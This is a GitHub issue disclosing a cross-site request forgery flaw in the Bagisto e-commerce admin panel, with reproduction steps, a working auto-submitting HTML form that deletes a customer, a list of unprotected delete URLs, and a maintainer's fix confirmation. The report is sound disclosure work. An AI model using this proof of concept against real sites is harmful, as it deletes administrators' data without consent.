Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross site request forgery #750

Closed
VikramRajVashisth opened this issue Mar 27, 2019 · 1 comment
Closed

Cross site request forgery #750

VikramRajVashisth opened this issue Mar 27, 2019 · 1 comment
Assignees
Labels
Bug Fixed When bug issue is fixed. Critical Something critical. Need immediate access.

Comments

@VikramRajVashisth
Copy link

Vulnerable link: https://demo.bagisto.com/bagisto-103-206-131-18/admin/

What is CSRF ?
A CSRF attack forces a logged-on victims browser to send a forged HTTP request, including the victims session cookie and any other automatically included authentication information, to a vulnerable web application.
Vulnerable Page: Admin Panel menu
cs1

Task: To remove items from table without account owner consent.
How to detect the vulnerability?
It is fairly easy to detect csrf vulnerability via automated tools or code analysis. Here, we will directly look at the href urls of the Delete button which submits value without csrf token using inspect element in the browser.

How to reproduce the attack?
Step1: Admin (victim) signs into Bagisto admin panel and does not sign off or doesn't close browser.
Step2: Admin (victim) opens tab (attacker-controlled website with auto load request containing information the attacker wants to delete), details of request sent to bagisto server, auto loads evil script to delete items from the list.
Step3: Browser executes evil script on attackers behalf and updates the list.

Malicious page containing evil script to edit list:
1.1) Delete users on admin panel: No csrf token used on customer delete button.
The attacker needs to send a link to page containing below code which will be executed when opened in victims browser.


<html>
<body>
<body onload="document.forms[0].submit()">
<form type="hidden" method="get" action="https://demo.bagisto.com/bagisto-103-206-131-18/admin/customers/delete/10">
<!-- Field -->
<input  href="#" value="Save Changes" type="submit">
</form>
</body>
</html>

1.2) Deleting review on admin panel:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/reviews/delete/4
1.3) deleting group:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/groups/delete/1
1.4) Locales:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/locales/delete/2
1.5) Currencies:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/currencies/delete/2
1.6) Exchange rates:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/exchange_rates/delete/2
1.7) Inventory sources:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/inventory_sources/delete/1
1.8) channels:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/channels/delete/1
1.9) Users:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/users/delete/1
1.10) Sliders:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/slider/delete/1

Impacts of vulnerability:
Using this flaw an attacker can remove important functionality of the application which results into denial of most of the services on the store.

Prevention Cheat sheet for developers:
https://www.incapsula.com/web-application-security/csrf-cross-site-request-forgery.html
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

@jitendra-webkul jitendra-webkul added the Critical Something critical. Need immediate access. label Mar 27, 2019
@prashant-webkul prashant-webkul added the QA Passed When QA pass the pull request. label Apr 1, 2019
prashant-webkul added a commit to prashant-webkul/bagisto that referenced this issue Apr 9, 2019
@prashant-webkul prashant-webkul added Bug Fixed When bug issue is fixed. and removed QA Passed When QA pass the pull request. labels Apr 9, 2019
@jyoti-webkul
Copy link
Contributor

Framework Version: 0.1.5
Fixed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Bug Fixed When bug issue is fixed. Critical Something critical. Need immediate access.
Projects
None yet
Development

No branches or pull requests

4 participants